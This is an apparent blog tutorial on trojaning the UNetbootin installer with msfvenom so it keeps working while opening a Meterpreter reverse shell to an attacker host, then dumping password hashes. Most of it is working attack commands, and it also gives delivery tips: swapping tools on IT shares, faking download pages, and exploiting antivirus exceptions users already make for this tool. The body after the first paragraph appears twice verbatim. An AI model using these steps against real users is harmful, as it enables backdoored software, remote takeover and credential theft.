Backdooring While Preserving Functionality
One really nice feature of msfvenom is the ability to backdoor a PE (portable executable), while still maintaining its normal functionality. There are certainly complexities and limitations, but under the right circumstances, this can be a very effective methodology. I'm going to demonstrate this attack by backdooring the very popular UNetbootin tool, which is commonly used for creating bootable Linux USB drives. The reason I've picked this target PE, is due to the fact that the developer specifically states it may be flagged by antivirus. Since this software is known for antivirus false positives, this could cause a victim who has downloaded a malicious version to be more likely to create an antivirus exception, resulting in pwnage.
To start with, I downloaded Unetbootin to my Kali Linux box:
wget https://github.com/unetbootin/unetbootin/releases/download/661/unetbootin-windows-661.exe -O unetbootin-windows-661.exe.orig
Next, I used the -k option with msfvenom, designed to preserve the input file's behavior and inject the payload as a new thread:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.31.27.200 LPORT=8080 -b "\x00" -f exe -k -x unetbootin-windows-661.exe.orig -o unetbootin-windows-661.exe
-p = Payload
LHOST = IP address of my Kali box in my test environment
LPORT = The port I will have Metasploit's payload handler listening on
-b = Avoid these bad characters (automatically triggers encoding)
-f = The output file format
-k = Preserve the template behavior
-x = The input file
-o = The output file
You can see I embedded a 32 bit backdoor pointing to my attack box, into this 32 bit PE.
There are many ways an attacker could deliver the malicious executable to the victim, including through an email attack, or a watering hole attack on a public website. During penetration test projects, I'm often able to gain access to an internal network and find a share belonging to the IT department. This share will very often contain various PEs like Unetbootin, PsTools, PuTTY, etc. Replacing one of those with a malicious version can be a great shortcut to expand influence.
As a proof-of-concept for this demonstration, I'm going to start up a little HTTP server with Python, to serve the malware. Nothing fancy. However, a real world attacker could take this even further, by using tools to impersonate the legitimate download page for UNetbootin and even trying to use SEO to get their malicious download page to the top of search results. Here's the Python command:
python -m SimpleHTTPServer 80
The executable is then downloaded by the victim and is placed in a folder which has been configured as an exception in the antivirus. Or, in some cases, the victim may go ahead and run it, get an antivirus warning and then tell the antivirus to a create an exception. Once again, this is somewhat expected, because even the legitimate download page warns of antivirus false positives.
Of course, an attacker would have had their C2 listening already, but at this point, in my lab I'm going to prepare Metasploit so that I can spawn a Meterpreter session:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 172.31.27.200
set lport 8080
run
Once the malicious version of UNetbootin is executed, a Meterpreter session is spawned. You can see that the UNetbootin GUI behaves normally, including dropdown boxes, etc., even when backdoored.
I quickly upgrade to a 64 bit session so I can dump hashes, etc., and it's game over:
background
use windows/local/payload_inject
set payload windows/x64/meterpreter/reverse_tcp
set lhost 172.31.27.200
set session 1
run
hashdump
To start with, I downloaded Unetbootin to my Kali Linux box:
wget https://github.com/unetbootin/unetbootin/releases/download/661/unetbootin-windows-661.exe -O unetbootin-windows-661.exe.orig
Next, I used the -k option with msfvenom, designed to preserve the input file's behavior and inject the payload as a new thread:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.31.27.200 LPORT=8080 -b "\x00" -f exe -k -x unetbootin-windows-661.exe.orig -o unetbootin-windows-661.exe
-p = Payload
LHOST = IP address of my Kali box in my test environment
LPORT = The port I will have Metasploit's payload handler listening on
-b = Avoid these bad characters (automatically triggers encoding)
-f = The output file format
-k = Preserve the template behavior
-x = The input file
-o = The output file
You can see I embedded a 32 bit backdoor pointing to my attack box, into this 32 bit PE.
There are many ways an attacker could deliver the malicious executable to the victim, including through an email attack, or a watering hole attack on a public website. During penetration test projects, I'm often able to gain access to an internal network and find a share belonging to the IT department. This share will very often contain various PEs like Unetbootin, PsTools, PuTTY, etc. Replacing one of those with a malicious version can be a great shortcut to expand influence.
As a proof-of-concept for this demonstration, I'm going to start up a little HTTP server with Python, to serve the malware. Nothing fancy. However, a real world attacker could take this even further, by using tools to impersonate the legitimate download page for UNetbootin and even trying to use SEO to get their malicious download page to the top of search results. Here's the Python command:
python -m SimpleHTTPServer 80
The executable is then downloaded by the victim and is placed in a folder which has been configured as an exception in the antivirus. Or, in some cases, the victim may go ahead and run it, get an antivirus warning and then tell the antivirus to a create an exception. Once again, this is somewhat expected, because even the legitimate download page warns of antivirus false positives.
Of course, an attacker would have had their C2 listening already, but at this point, in my lab I'm going to prepare Metasploit so that I can spawn a Meterpreter session:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 172.31.27.200
set lport 8080
run
Once the malicious version of UNetbootin is executed, a Meterpreter session is spawned. You can see that the UNetbootin GUI behaves normally, including dropdown boxes, etc., even when backdoored.
I quickly upgrade to a 64 bit session so I can dump hashes, etc., and it's game over:
background
use windows/local/payload_inject
set payload windows/x64/meterpreter/reverse_tcp
set lhost 172.31.27.200
set session 1
run
hashdump
Comments
Post a Comment